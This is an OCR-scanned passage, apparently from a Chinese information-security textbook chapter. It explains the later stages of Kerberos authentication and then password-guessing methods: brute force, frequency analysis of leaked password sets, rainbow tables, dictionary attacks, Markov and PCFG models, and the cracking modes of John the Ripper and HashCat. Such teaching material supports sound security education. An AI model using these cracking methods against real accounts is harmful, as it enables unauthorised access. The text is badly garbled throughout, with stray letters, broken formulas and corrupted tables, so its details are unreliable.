户 的 身份 后 返回 给 用 户 一 个 信息 { 有 Kctgs,IDtes,TS2,LT2,Tickettgs }, 这 个 信息 由 了 ke 进行 加 密 ， 
用 户 可 以 用 自身 和 AS 共享 的 密 钥 Kc 来 解密 。 这 个 信息 中 包含 了 用 户 可 以 访问 票据 许可 
服务 器 (TGS ) 的 票据 Tickettes 以 及 用 户 和 票据 许可 服务 器 (TGS ) 之 间 通 信和 的 密 钥 Ketes。 


认证 服务 器 (AS ) 


典 据 许可 服务 器 
(TGS) 


{ID,, Ticket,, ,AU.} 


Ere {K,,,ID,,TS ,, Ticket ,} 


> 用 户 (C) 


Ticket ,, = Eu {K.u ID: „AD. „IDe ,TS, ,LT,} 
AU .=Ec .ws {IDe ,AD. .TS; } 


Ticket ,=Ew, {K,,.ID<,AD .ID, ,TS ,, LT,} 
图 7-3 第 二 阶段 信息 交换 示意 图 


Kerberos 协议 的 第 二 阶段 : 用 户 〈C) 与 票据 许可 服务 器 (TGS) ZE, H CC) 
获取 服务 器 (V ) 的 服务 许可 票据 Ticketv o 

用 户 〈C) 向 票据 许可 服务 器 (TGS) 发送 请 求 : IDv: 用 户 请 求 服务 器 ; Tickettes: 
向 TGS 证 实 该 用 户 已 经 被 As 认证 ; AUc: 由 用 户 的 客户 端 生 成 ， 由 Ecte MWE, MF 
验证 ticket。Eketee: 使 用 用 户 〈C) 和 TGS 共享 的 密 钥 Keres KIN, MRI TGS 返回 
给 用 户 (C) 的 信息 ， 可 用 Keres ft. 
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票据 许可 服务 器 (TGS) 返回 应 答 信息 给 用 户 〈C): SETH (CC) 和 TGS 共享 口 
S Keres 的 加 密 ， 使 得 TGS 和 客户 端 可 以 验证 口令 ， 并 保护 通信 安全 ; Kev: 由 TGS 产 
生 ， 是 用 户 和 服务 器 CV) 之 间 进 行 信息 交换 时 的 临时 口令 ; IDv: 确认 该 票据 是 为 服务 
器 而 签发 ，TS4: 时 间 惟 :Ticketv: 由 Ew 加 密 用 户 用 来 访问 服务 器 的 票据 。Exv: 使 用 
TGS 服务 器 知道 的 会 话 密 钥 K 加 密 信息 以 防止 信息 被 算 改 。 

具体 过 程 : 用 户 〈C) 将 访问 TGS 的 票据 和 对 服务 器 的 请 求 以 及 自己 的 信息 {IDv, 
Tickettss，AUc} 发 送 到 TGS 进行 验证 ，TGS 验证 用 户 的 身份 以 及 请 求 后 返回 给 用 户 一 个 
信息 { Key, IDv, TS4 Ticketv }， 这 个 信息 由 进行 加 密 ， 用 户 可 以 用 自身 和 TGS 共享 的 密 
钥 Ketgs 来 解密 。 同 时 这 个 信息 中 包含 了 用 户 可 以 访问 服务 器 CV) 的 票据 Ticketv 以 及 
用 户 和 服务 器 CV) 之 间 通 信 的 密 钥 Kcv。 


P Ge 


认证 服务 器 (AS ) 票据 许可 服务 器 
(TGS) 


G {Ticket ,, AU: } 


< X 

> | 
G Bier TSI = 
用 户 (C) 


Ticket » = Exes {K.。,ID.,AD .,ID us ,TS ,, LT} 


AU-=Exe.s {ID-,AD-,TS;} 


Ticket, = Ex {K., ,ID.,AD.,ID, ,TS, ,LT,} 


图 7-4 第 三 阶段 信息 交换 示意 图 
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Kerberos 协议 的 第 三 阶段 : M O 与 服务 器 (V) 交互 ， 用 户 〈C) 获得 服务 。 

HP CC) 向 服务 器 CV) 发 送 服务 请 求 : Ticketv: 向 服务 器 证 实 该 票据 已 被 AS 和 
TGS 认证 ; AUc: 由 用 户 的 客户 端 生成 ， 用 于 验证 ticket. 

服务 器 (V) 返回 应 答 信息 给 用 户 〈C): SEPA CC) 和 服务 器 共享 口令 Kcv 来 
加 密 ， 使 用 户 确认 这 报 文 来 自 于 服务 器 CV); TSs+1: 时 间 戳 ， 使 用 户 确 信 这 不 是 报 文 
重 放 攻 击 。 

有 具体 过 程 : A CC) 将 访问 服务 器 CV) 的 票据 和 自身 的 信息 { Ticketv, AUc } 发 送 
给 服务 器 进行 验证 ; 服务 器 验证 用 户 的 身份 以 及 请 求 后 ， 返 回 给 用 户 一 个 信息 {TSs+1}， 
这 个 信息 由 Ekev 进 行 加 密 ， 用 户 可 以 用 自身 和 服务 器 之 间 共 享 的 口令 Kev 来 解密 。 同 时 
用 户 可 以 开始 访问 服务 器 。 

(6) Kerberos 身份 认证 带 来 的 好 处 

© 身份 委派 。Windows 服务 可 按照 用 户 的 意愿 模仿 客户 端 访问 网 络 资源 。Kerberos 
协议 可 以 使 一 个 服务 为 客户 端 完成 本 地 计算 机 上 的 资源 访问 ， 同 时 可 以 使 一 个 服务 在 连 
接 到 其 他 服务 时 去 模仿 客户 端 。 

@ 更 高 效 的 身份 认证 。Kerberos 身份 认证 协议 ， 服 务 器 不 用 去 连接 域 控制 器 ， 相 应 
的 ， 服 务 器 可 以 检验 客户 端 提供 的 验证 的 票据 。 客 户 端 可 以 为 特定 的 服务 获取 一 次 验证 
票据 并 在 一 次 登录 过 程 中 反复 使 用 这 个 验证 票据 。 

© 相互 身份 验证 。 通 过 使 用 Kerberos 协议 ， 在 网 络 连接 的 一 端 都 可 以 以 验证 网 络 
另 一 端的 声明 是 它 自己 的 实体 。 


7.1.2 身份 认证 技术 


71.21 口令 猜测 技术 

1. brute force (暴力 攻击 ) 

基于 密码 加 密 的 暴力 破解 法 。 试 验 所 有 可 能 的 口令 组 合 来 破解 口令 。 即 通过 穷 举 的 
方法 来 破解 ， 将 口令 进行 逐个 推算 或 辅 以 字典 来 缩小 口令 范围 ， 直 到 找 出 真正 的 口令 的 
一 种 口令 分 析 方 法 。 暴 力 攻击 的 方法 往往 是 不 可 行 的 ， 由 于 时 间 和 设备 的 约束 。 暴 力 破 
解 理论 上 能 破解 所 有 的 文本 口令 ,但 时 间 和 性 能 开销 随 字符 集 规模 和 长 度 的 变化 非常 大 。 

暴力 攻击 的 猜测 次 序 是 由 字母 表 来 决定 的 。 举 例 来 说 ， 一 个 攻击 者 对 于 3 个 字符 的 
口令 ,使 用 小 写字 母 表 ， 那 么 他 的 猜测 就 会 从 “aaa”* 开 始 ， 以 “zzz” 结 束 。 但是， 由 于 不 同 
的 攻击 者 选择 增 量 的 从 左边 开始 还 是 从 右边 开始 的 不 用 ， 比 如 一 些 人 采用 右边 增 量 ， 则 
猜测 次 序 为 “aaa,aab,aac”， 而 另 一 些 人 选择 从 左边 增 量 ， 则 猜测 次 序 为 “aaa,baa,caa”， 而 
这 对 于 口令 破解 的 时 间 有 着 巨大 影响 。 

2. 字符 频率 分 析 

字符 频率 分 析 ， 常 被 应 用 在 密码 学 中 ， 尤 其 是 用 于 破解 古典 密码 。 并 且 在 数据 压缩 
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技术 中 也 有 应 用 ， 如 著名 的 霍 夫 曼 编码 。 在 暴力 破解 前 ， 人 们 统计 每 个 字符 在 训练 集中 
的 出 现 频率 ， 在 破解 的 过 程 中 ， 优 先 使 用 频率 高 的 字符 进行 猜测 ， 可 以 显著 提高 单纯 暴 
力 破 解 的 效率 。 和 单纯 暴力 破解 相 比 ， 经 过 字符 频率 分 析 后 ， 若 是 想 完全 覆盖 一 个 口令 
字符 空间 ， 其 猜测 次 数 仍然 是 
yt 
k=0 
其 中 同样 是 最 大 的 口令 长 度 ，x 依旧 是 字符 空间 的 大 小 。 但 是 ， 在 猜测 的 过 程 中 ， 
字符 在 字符 集中 的 前 后 排列 顺序 根据 训练 集中 出 现 的 频率 由 大 到 小 进行 排序 。 这 样 ， 攻 
击 者 能 够 在 有 限 的 猜测 次 数 中 优先 破解 出 大 部 分 口令 。 
字符 频率 分 析 的 结果 会 根据 训练 集 的 差异 有 很 大 的 不 同 ， 为 了 取得 更 好 的 破解 效 
率 ， 我 们 应 该 分 析 破解 目标 的 特点 ， 使 用 最 合适 的 训练 集 。 图 7-5 显示 了 英语 国家 字母 
频率 分 析 。 


etaoinshrdicumwfgypbvkjxqz 
图 7-5 英语 字母 频率 分 布 图 


这 虽然 是 通过 训练 英国 著名 小 说 《 白 鲸 记 》 得 到 的 ， 但 是 无 论 是 美国 康 奈 尔 大 学 数 
学 探索 项 目 统计 了 40000 个 单词 后 得 到 的 表 ， 还 是 牛津 大 学 出 版 社 分 析 简 明和 牛津 词典 的 
词 条 后 得 出 的 结论 都 和 这 张 表 中 的 数据 大 同 小 异 。 以 上 结果 ， 说 明 英 语 语言 相关 作品 大 
部 分 符合 相同 的 字符 频率 排列 ， 参 见 表 7-1。 
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表 7-1 英语 国家 密码 集 的 频率 分 布 

密 码 集 字母 频率 分 布 

Phpbb aeorisnlt1 2md0cp3hbuk45g9687yfwjvzxqASER 

Phpbb sl mpabctdrlfhgkjnw2e100v3q45796z8yuxSMPB 

Phpbb elnsra326yt0d945078lkgmihbpcexuwfzjvq!ESA 
Rockyou aelionrlsO2tm3c98dy54h6b7kpgjvfwzAxEIORL 
Rockyou sm cba0pljdtrk2hgfniew39v4508y76zZMSBACIq 
Rockyou lae326sn5794y08roltdihgmukze!pxwbA fEjS* 
Myspace ealoirsintl cmd0hb3yugk9p6485f£7wvjz!x.AES 
Myspace sbmepldatj 1 frhgkinwe2o0vy304uB8$95z76MJDC 
Myspace 1326795408! esarty.ntdlohkmg*ucpibxjfzw?$v 
Hotmail aeoilr01n2st9mc8376Su4dbpghyvfkjAZEIOxRL 
Hotmail almbc2sp0lterdjfgn3hi6k759vo48y AWMzBSCuq 
Hotmail aos01326e57849nrilydzmtuAhbO. gck*SxpfE@+ 


通过 对 英语 国家 已 泄露 口令 集 进 行 分 析 ， 我 们 发 现实 际 生 活 中 人 们 使 用 的 密码 也 符 
合 图 里 的 频率 分 布 。 在 表 中 ， 我 们 发 现 几 乎 全 部 口令 集中 的 频率 分 布 都 符合 英语 语言 
母 频率 分 布 ， 说 明 大 多 数 人 口令 中 的 字符 频率 与 自己 本 国 的 语言 习惯 相符 。 但 是 在 首 字 
母 中 ， 大 写字 母 占 了 一 部 分 ， 说 明 人 们 习惯 使 用 大 写字 母 作 为 密码 的 第 一 个 字符 ; EK 
字母 中 ， 特 殊 字 符 及 数字 又 有 所 增加 ， 说 明 人 们 更 倾向 于 与 将 非 字母 字符 放置 于 密码 的 
末尾 。 这 些 特性 ， 对 于 其 他 的 猜测 攻击 方法 也 有 着 重要 的 指导 意义 。 

3. 彩虹 表 

在 一 个 标准 的 离线 口令 破解 攻击 中 ， 攻 击 者 拥有 口令 的 散 列 值 ， 并 试图 猜 出 创建 它 
的 口令 。 根 据 所 使 用 的 散 列 算法 ， 攻 击 者 通常 花费 绝 大 部 分 时 间 对 猜测 进行 哈 希 。 如 果 
加 密 过 程 没 有 使 用 盐 (salt)， 这 些 攻击 者 生成 的 哈 希 值 可 以 存储 起 来 并 被 重用 到 以 后 的 
破解 中 ， 这 是 因为 相同 的 猜测 散 列 值 总 是 相同 的 。 

这 种 预先 计算 攻击 最 简单 的 办 法 是 创建 一 个 数据 库 保 存 先前 的 猜测 散 列 ， 而 在 以 后 
新 的 口令 破解 会 话 ， 只 需要 查询 创建 的 数据 库 。 如 果 散 列 匹配 ， 攻 击 者 只 要 在 数据 库 中 
找到 它 相 应 的 明文 ， 破解 就 完成 了 。 这 种 查找 很 快 (通常 只 需 儿 秒 )， 这 大 大 减少 了 破解 
常见 口令 的 时 间 花 费 。 而 这 样 的 一 个 数据 库 被 称 为 一 个 散 列 查 找 表 。 

散 列 查 找 表 的 最 大 问题 是 存储 空间 过 大 ,以 Church 的 无 线路 由 哈 希 查找 表 为 例 ， 总 
的 密 钥 空间 是 十 亿 〈1,000X 1,000.000)， 表 的 总 大 小 约 为 33G。 因 此 ， 如 果 加 上 更 多 的 
词组 规则 ， 表 将 变 得 太 大 而 无 法 实现 。 

彩虹 表 可 以 看 成 是 一 种 非常 有 效 ， 但 有 损耗 的 压缩 散 列 查找 表 的 实现 算法 。 它 采用 
时 空 折 中 思路 ,引入 hash 链 的 每 一 步 的 使 用 不 同 的 还 原 函 数 并 去 除了 辨识 点 的 思想 。 其 
基本 思路 为 : 假设 有 一 种 口令 哈 希 函 数 再 和 一 个 有 限 口 令 集 P， 目 标 是 预先 计算 一 个 数 
据 结构 ， 对 于 任意 的 哈 希 函数 输出 h， 都 能 很 快 地 在 P 中 定位 p， 使 得 Hp)=h， 或 确定 
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在 P 中 有 没有 这 么 一 个 p。 

4. Dictionary Attack (字典 攻击 ) 

在 破解 密码 或 密 钥 时 ， 逐 一 尝试 用 户 自 定义 词典 中 的 单词 或 短语 的 攻击 方式 。 与 强 
力 破 解 相 区 分 的 是 ， 强 力 破解 会 逐一 尝试 所 有 可 能 的 组 合 密码 ， 而 字典 攻击 会 使 用 一 个 
预先 定义 好 的 单词 列表 。 以 已 泄露 的 密码 集 或 改进 的 密码 集 作为 字典 文件 ， 基 于 一 定 的 
变形 规则 进行 猜测 。 字 典 破 解 的 成 功率 不 仅仅 取决 于 所 选 的 输入 字典 ， 还 和 变形 规则 有 
关 。 字 典 破解 相对 暴力 破解 更 快 ， 然 而 问题 是 猜测 次 数 是 有 限 的 。 这 意味 着 攻击 者 使 用 
越 大 的 输入 字典 ， 应 用 到 每 个 单词 的 变形 规则 就 越 少 。 同 样 的 ， 如 果 攻 击 者 想 使 用 很 有 
侵略 性 的 变形 规则 ， 以 至 于 每 个 单词 都 有 成 千 上 万 次 猜测 ， 则 他 必须 选择 很 小 的 ， 有 针 
对 性 的 输入 字典 。 这 两 种 破解 技术 一 一 大 的 输入 字典 、 简 单 的 变形 规则 和 小 字典 、 复 杂 
的 变形 规则 一 一 并 不 一 定 是 相互 排斥 的 ， 很 多 攻击 者 经 常 采用 多 轮 的 策略 来 破解 一 个 
令 ， 首 先 尝试 一 个 小 的 字典 ， 如 果 破 解 失败 ， 则 再 尝试 更 大 的 字典 。 

字典 攻击 是 攻击 者 使 用 一 个 攻击 者 认为 可 能 会 用 在 口令 中 的 单词 字典 ,攻击 者 试图 
重 现 这 种 口令 选择 的 方法 ， 从 输入 字典 中 抽出 单词 并 且 使 用 各 种 变形 规则 对 输入 的 单词 
进行 处 理 ， 用 经 过 变形 后 的 单词 进一步 匹配 目标 口令 。 对 于 一 个 成 功 的 字典 攻击 它 需要 
最 原始 的 单词 成 为 攻击 者 的 输入 字典 ， 并 且 攻 击 者 对 字典 使 用 正确 的 字 处 理 规 则 。 

但 是 也 正 是 这 个 原因 ， 字 和 典 攻击 在 下 面 的 情况 下 会 失效 : 

@ 目标 口令 的 创建 规则 并 不 是 攻击 者 猜测 的 容易 受到 攻击 的 规则 。 比 如 一 些 网 站 、 
系统 推荐 的 随机 口令 。 

@ 攻击 者 输入 的 字典 不 够 全 面 不 包含 目标 口令 中 的 基本 单词 。 

@ 攻击 者 使 用 变形 规则 并 没有 包含 目标 口令 所 使 用 的 规则 。 

所 以 ， 字 和 典 攻击 的 成 功率 主要 取决 于 所 选取 的 字典 和 采取 的 变形 规则 ， 两 者 互相 限 
制 。 由 于 计算 能 力 的 限制 ， 猜 测量 在 一 定时 ， 攻 击 者 选择 更 大 的 字典 ， 那 么 每 个 单词 的 
变形 规则 就 会 变 少 。 同 样 ， 如 果 攻 击 者 使 用 更 多 更 全 面 的 变形 规则 ， 每 个 单词 将 会 产生 

量 的 猜测 ， 这 时 就 必须 选择 更 有 代表 性 、 单 词 数量 更 小 的 字典 。 

5. 基于 概率 的 口令 猜测 

(1) 马尔 可 夫 链 

马尔 可 夫 链 又 叫做 离散 时 间 马 尔 可 夫 链 ， 是 在 状态 空间 内 从 一 个 状态 转换 到 另 一 状 
态 的 随机 过 程 。 该 过 程 具有 “无 记忆 ”的 性 质 : 下 一 个 状态 的 概率 分 布 由 当前 状态 所 决 
定 ， 在 时 间 顺 序 中 和 它 前 面 的 事件 无 关 。 这 种 性 质 也 被 叫做 马尔 可 夫 性 质 ， 在 实际 应 用 
中 作为 统计 模型 具有 很 多 的 应 用 。 

在 马尔 可 夫 链 的 每 一 步 中 ， 系 统 根据 概率 分 布 ， 可 从 一 个 状态 转变 到 另 一 个 状态 ， 
也 可 以 保持 当前 状态 。 状 态 的 改变 叫做 过 渡 ， 与 不 同 的 状态 改变 相关 的 概率 叫做 过 渡 概 
率 。 比 如 ， 对 于 满足 马尔 可 夫 性 质 的 随机 变量 序列 X, X2, X3, ++, Xn, W FWA! 
的 状态 Zrtl 的 条 件 分 布 只 取决 于 当前 的 状态 她 ， 与 过 去 的 状态 无 关 ， 我 们 做 出 如 下 定 
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义 〈 每 个 状态 的 概率 P CXL, X2, X, =, Xn) >0)， 则 
P( Xn =x|X 15x1, X2 =x2, X35x3, +- , Xn=xn) 
=P(Xn+1 = x| Xn = xn) 

以 上 公式 中 下 所 有 可 能 的 取 值 构成 了 该 链 的 状态 空间 S, 这 表示 从 一 个 时 刻 到 下 一 
个 时 刻 的 概率 P (Xint+1 =x| Xn=xn), 强调 了 马尔 可 夫 链 与 P(Xn-1=xn-1) 这 一 结构 无 关 。 

马尔 可 夫 链 还 有 相应 的 变种 形式 ， 比 如 多 阶 马尔 可 夫 链 ， 例 如 m 阶 马尔 可 夫 链 (其 
中 m 是 有 限 的 )， 其 公式 如 下 所 示 : 

P( Xn =x | X15x1, X2 =x2, X 35x3,- , Xn=Xn) 
=P(Xn+1 = x| = Xn, Xnm+1 = Xn-m+1, Xam = Xnm)n >m 

也 就 是 说 从 一 个 时 刻 到 下 一 个 时 刻 的 概率 ， 未 来 的 下 一 个 状态 取决 于 之 前 的 m 个 

马尔 可 夫 链 具有 以 下 性 质 : 

。 可 还 原 性 ; 

。 周期 性 ; 

。 重 现 性 ; 

。 KAWE: 

。 律动 性 。 

有 基于 全 串 的 马尔 可 夫 链 ， 以 “password” 为 例 ， 其 公式 如 下 所 示 : 

P(password)=P(p)P(alp)P(s{pa)P(s|pas)--- P(d|passwor) 

对 于 变种 的 马尔 可 夫 链 ， 我 们 假设 最 高 阶 是 4 阶 ， 同 样 是 以 “password” 的 概率 为 

例 ， 其 公式 如 下 所 示 : 
P(password)=P(p)P(alp)P(s|pa)P(s|pas): -- P(d|swor) 

通常 情况 下 ， 可 以 使 用 一 个 已 泄露 的 密码 口令 集 作为 训练 集 ， 统 计 得 到 一 个 在 有 n 
阶 字符 子 串 出 现 概率 的 数据 库 。 利 用 马尔 科 夫 模型 的 可 还 原 性 ， 能 够 计算 出 任何 一 个 
令 在 训练 集中 的 概率 。 在 猜测 过 程 中 ， 将 高 概率 的 字符 子 串 组 成 的 口令 依次 输出 。 但 是 
该 模型 依旧 存在 着 不 足 之 处 ， 得 到 的 mn 阶 字符 子 串 长 度 是 规定 好 的 ， 并 不 能 体现 口令 中 
的 语义 、 变 形 等 规律 ， 同 时 训练 集中 不 存在 的 字符 子 串 概率 很 难 计算 。 

(2) 基于 PCFG 方法 

基于 PCFG 的 方法 允许 用 户 创建 自己 的 口令 并 且 自 动 从 训练 集中 导出 编码 规则 。 将 
数据 集 分 成 两 个 部 分 ， 分 成 训练 集 和 测试 集 两 部 分 。 随 机 的 从 其 中 一 个 口令 数据 集中 选 
择 部 分 口令 集 作为 PCFG 训练 集 ， 同 时 从 剩 下 的 每 个 口令 数据 集中 随机 的 选择 部 分 口令 
集 作为 PCFG 的 测试 集 。 选 择 训练 集 的 理论 依据 是 ， 选 择 数据 集中 会 有 更 多 不 同 的 组 成 
类 型 。 

首先 ， 它 将 所 有 训练 集中 的 口令 划分 成 相应 字符 的 序列 片段 ， 并 且 获 得 相应 的 基本 
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结构 及 其 相关 的 发 生 概率 。 在 训练 程序 中 ， 对 于 给 定 的 训练 集中 的 每 一 个 口令 ， 将 口令 
变换 成 基础 结构 类 型 ， 并 将 这 样 的 基础 结构 加 入 专门 保存 基础 结构 的 列表 中 ， 相 同 的 基 
础 结构 类 型 的 不 再 重复 的 增加 进入 列表 。 同 时 计算 相同 基础 结构 类 型 的 出 现 的 次 数 ， 并 
且 计 算出 所 有 基础 结构 类 型 出 现 的 总 次 数 。 计 算 每 个 口令 中 存在 的 数字 和 特殊 字 符 的 概 
率 。 这 些 数字 和 特殊 字符 以 个 数 来 分 开 存储 。 
例如 ,口令 “wanglei@123” 中 “wanglei” 将 划分 为 工 片 段 ,“@” 将 划分 成 S 片段 ， 
“123” 将 划分 成 DD 片段。 它 的 基础 结构 是 LiSiD3。L7S1D; 的 概率 如 下 : 
#count(L7S1D;) 
#count(base — structure) 
“123” 代 表 的 D3 片段 在 所 有 的 口令 中 的 概率 如 下 : 
#count("123") 
#count(D3) 
同 理 “@” 代 表 的 S 片段 在 所 有 口令 中 出 现 的 概率 如 下 ， 这 些 信息 用 于 生成 概率 
上 下 文 无关 文法 。 
#count("@") 
#count(S1) 
然后 ， 就 可 以 得 到 以 降序 排列 的 概率 口令 猜测 ， 这 里 的 概率 口令 指 的 是 基础 结构 类 
型 。 在 生成 新 的 训练 集 的 程序 中 ， 将 存储 基础 结构 类 型 列表 中 的 每 个 基础 结构 片段 与 外 
部 输入 的 字典 、 在 训练 程序 中 生成 的 数字 和 特殊 字符 存储 的 文件 进行 比 对 ， 生 成 新 的 
令 训 练 集 。 还 是 以 基础 结构 LSD Yl, Lr 片段 表示 此 结构 中 有 7 个 连续 的 字母 ,那么 
就 在 外 部 输入 的 字典 中 寻找 字母 长 度 为 7 的 口令 ， 并 保存 到 用 来 存储 字母 的 列表 中 ;Si 
同样 的 表示 此 结构 中 有 一 个 特殊 字符 ， 那 么 就 将 保存 相应 个 数 的 特殊 字符 文件 中 的 内 容 
保存 到 用 来 存储 数字 的 列表 中 , 同样 的 可 以 将 数字 保存 到 相应 的 用 来 存储 数字 的 列表 中 。 
在 这 些 列 表 生 成 完了 之 后 ， 以 L7S1D; 的 顺序 对 每 个 列表 进行 遍历 ,将 遍历 中 匹配 到 
的 内 容 相 结合 ， 这 就 生成 了 新 的 训练 口令 集 。 比 如 ，L7SiD; 在 字典 中 匹配 到 字符 串 
“wanglei,zhangji”， 在 数字 和 特殊 字符 文件 中 匹配 到 “123”“@” 那么 生成 的 口令 就 
应 该 是 “wanglei@123” 和 “zhangji@123”。 而 任何 一 个 猜测 的 概率 都 是 其 内 部 各 个 片段 
概率 的 乘积 。 比 如 ,“wanglei@123” 的 概率 就 是 : 
P(""wanglei @123") = P(L7S1Ds) * P(L7 —> wanglei) * P(S1 > @) * P(D3 ->123) 
生成 的 新 的 训练 集中 ， 口 令 也 是 按照 概率 由 高 到 低 排列 。 数 字 片 段 和 特殊 字符 片段 
的 概率 从 训练 集中 得 出 ， 而 字母 字符 片段 的 概率 可 以 从 训练 集中 得 到 也 可 以 从 外 部 输入 
字典 中 得 到 。 
6. JTR 
John the Ripper 是 目前 最 为 流行 的 口令 破解 工具 之 一 ， 作 为 一 个 开源 软件 ， 我 们 可 
以 在 他 的 官网 上 免费 下 载 他 的 Linux 以 及 Windows 非 商业 版 本 。 我 们 也 可 以 付费 使 用 
John the Ripper Pro， 这 是 John the Ripper 的 商业 版 本 ， 使 用 者 还 可 以 付费 下 载 更 多 的 破 
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解 字 典 ， 使 用 更 多 的 功能 。 

John the Ripper 提供 下 列 四 种 模式 帮助 我 们 破解 目标 

e “Wordlist Crack Mode” 可 以 选择 使 用 规则 及 不 使 用 不 规则 的 字典 档 破解 模式 。 

e “Single Crack Mode”， 用 最 简单 的 变形 来 进行 破解 的 工作 ， 速 度 最 快 。 

e “Incremental Crack Mode” 暴 力 破 解 ， 尝 试 所 有 可 能 的 字符 组 合 。 

e “External Crack Mode”， 可 以 定义 用 户 自 己 的 破解 模式 。 

其 中 ,“Single Crack Mode” 是 根据 用 户 的 名 称 ， 加 上 常见 的 变化 而 猜测 密码 。 例 如 
破解 Linux 用 户 密码 , 我 们 得 到 Linux 账号 密码 文件 shadow.txt, 文件 中 存在 用 户 名 称 等 
信息 。 假 设 用 户 名 叫 fool， 而 他 的 密码 是 fool123、fooll、loof、loof123、lofo…… 这 样 
简单 的 用 户 密码 一 般 会 在 很 短 的 时 间 内 会 被 全 部 猜测 出 来 。 

“Wordlist Crack Mode” 使 用 字典 文件 来 进行 破解 ， 因 为 设置 密码 的 人 倾向 于 使 用 常 
用 的 单词 ， 如 人 们 常用 hello, superman, cooler, asdfgh, 123456 等 作为 自己 的 密码 。 
而 此 模式 下 的 rules 参数 则 在 此 基础 上 再 加 上 些 变化 , 如 字典 中 有 单词 cool, 则 John The 
Ripper 还 会 尝试 使 用 cooler, CoOl, Cool 等 单词 变化 进行 解密 。 一般 视 SHADOW 中 的 
用 户 多 少 及 你 的 字典 大 小 、 你 的 机 器 速度 ， 此 模式 的 解密 时 间 从 几 小 时 到 几 天 不 等 。 

“Incremental Crack Mode” 的 主要 原理 是 遍历 所 有 可 能 的 密 匙 空间 ， 也 就 是 真正 的 
穷 举 暴力 破解 。John The Ripper 会 尝试 以 95 个 字母 (因为 从 键盘 上 只 能 输入 95 种 可 能 的 
键 值 ) 进 行 1-8(8 个 字母 是 密码 的 最 长 值 ， 所 有 密码 中 8 位 以 后 的 部 分 均 不 会 被 使 用 ， 目 
前 的 DES 加 密 体系 就 是 这 样 的 ) 个 长 度 的 所 有 组 合 ， 这 是 很 漫长 的 过 程 ， 据 相关 资料 计 
算 ， 该 过 程 破解 能 够 达到 上 万 年 。 不 然 ， 该 模式 下 能 够 预 设 猜测 时 间或 者 猜测 次 数 ， 从 
而 帮助 用 户 可 操作 的 破解 密码 。 

“External Crack Mode” 是 允许 使 用 者 自己 使 用 C 语言 编写 自己 的 破解 程序 ， 然 后 挂 
在 John The Ripper 下 进行 破解 。 这 种 模式 极 大 地 增加 了 John The Ripper 的 可 用 性 ， 方便 
用 户 破解 各 种 不 同类 型 的 密码 ， 是 John The Ripper 适合 各 种 情况 。 

在 使 用 过 程 中 ， 我 们 一 般 使 用 “Wordlist Crack Mode” 方 法 ， 配 合 不 同 的 字典 ， 使 
用 文件 John179\doc\RULES.txt 中 介绍 的 默认 规则 进行 破解 。 我 们 列 出 了 John the Ripper 
字典 破解 模式 默认 变形 规则 的 前 八 位 ， 参 见 表 7-2。 


表 7-2 John the Ripper 字典 破解 模式 默认 变形 规则 

变形 规则 
单词 原型 
纯 字 母 数字 单词 字母 部 分 全 小 写 
纯 字 母 数字 单词 字母 部 分 全 大 写 
纯 字 母 单词 全 小 写 的 复数 形式 
纯 字 母 单词 全 小 写 尾部 加 “1” 
纯 字 母 单词 全 大 写 尾部 加 “1” 
重复 某 些 短 的 纯 字 母 单词 
纯 字 母 单词 全 小 写 并 逆序 


排 名 


CS sjej] 


第 7 章 信息 系统 安全 工程 


常用 破解 工具 John the Ripper 提供 各 种 不 同 的 模式 供 使 用 者 进行 猜测 ， 其 中 较 常 用 
的 Wordlist Mode 就 是 一 种 字典 攻击 模式 。 在 John the Ripper 文件 夹 的 
john179\run\password Ist 文件 ， 就 是 一 个 默认 的 字典 文件 ， 在 John the Ripper 的 官网 上 ， 
我 们 可 以 得 到 包括 21 种 不 同 语言 的 单词 的 字典 , 并 且 还 有 针对 某 种 特定 语言 (如 意大利 
语 、 西 班 牙 语 等 ) 的 各 种 大 小 不 同 的 字典 ， 包 含 常用 单词 ， 已 经 该 语言 不 常用 的 隐 涩 单 
词 。John the Ripper 的 官网 总 共 能 提供 包括 400 万 单词 的 字典 。 

K 7-3 中 六 个 字典 大 小 不 同 , 来 自 不 同 的 语言 。English Lower”, “Finnish Lower”, 


表 7-3 显示 了 几 种 常用 字典 。 


字典 名称 单词 数量 
Dic-0294 869228 
English Lower 444678 
Common lower 816 
English Wiki 68611 
Swedish Lower 14555 
Finnish Lower 358963 


“Swedish Lower” 和 “Common lower” 可 以 从 John the Ripper 官网 上 获得 ， 其 中 
的 “lower” 表 示 该 字典 所 存储 的 都 是 小 写 单词 。“dic-0294” 可 以 从 著名 的 口令 破解 网 站 
outpost9 得 到 ， 该 字典 被 许多 传统 破解 工具 认为 是 非常 有 效 的 。 最 后 的 字典 
“English_Wiki” 是 一 个 维基 百科 的 镜像 网 站 所 产生 的 ， 他 将 全 球 不 同文 化 的 各 种 维基 百 
科 用 户 所 输入 的 词 条 信息 加 以 挑选 放 入 字典 。 

7. HASHCAT 

(1) 概述 

HashCat 是 世界 上 最 快 的 基于 CPU 的 口令 破解 工具 。HashCat 系列 软件 在 硬件 上 支 
持 使 用 CPU、NVIDIA GPU、ATI GPU 来 进行 密码 破解 。 在 操作 系统 上 支持 Windows、 
Linux 平台 ， 并 且 需 要 安装 官方 指定 版 本 的 显卡 驱动 程序 ， 如 果 驱 动 程序 版 本 不 对 ， 可 
能 导致 程序 无 法 运行 。 

HashCat 主要 分 为 三 个 版 本 : HashCat、oclHashCat-plus、oclHashCat-lite。 这 三 个 版 
本 的 主要 区 别 是 : HashCat 只 支持 CPU 破解 。oclHashCat-plus 支持 使 用 GPU 破解 多 个 
HASH, 并 且 支 持 的 算法 高 达 77 种 。oclHashCat-lite 只 支持 使 用 GPU 对 单个 HASH 进行 
破解 ， 支 持 的 HASH 种 类 仅 有 32 种 ， 但 是 对 算法 进行 了 优化 ， 可 以 达到 GPU 破解 的 最 


(2) 指定 hash 类 型 
在 HashCat 中 --hash-type ?参数 可 以 指定 要 破解 的 HASH 类 型 , 运行 HashCat 主 程序 
加 上 --help 参数 ， 在 * Generic hash types: 中 可 以 看 到 各 种 HASH 类 型 的 代号 ， 图 7-6 
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不 同 版 本 的 HashCat 所 支持 的 hash 类 型 有 所 不 同 ， 如 果 没 有 指定 --hash-type 参数 ， 
那么 程序 默认 为 MD5 类 型 。 


Generic hash types: 


6 MDS 

18 md5<Spass .$salt> 

208 md5¢<$salt .Spass> 

38 md5<unicode<$pass).$salt») 

40 md5<$salt -unicode<$pass>> 
SHAL 
shait$pass .$salt> 
shait$salt .Spass> 
shai(Cunicode<$pass>.$salt> 
shai<$salt .unicode<$pass)> 
MySQL 
phpass. MDS<Wordpress>. MDS <¢phpBB3> 
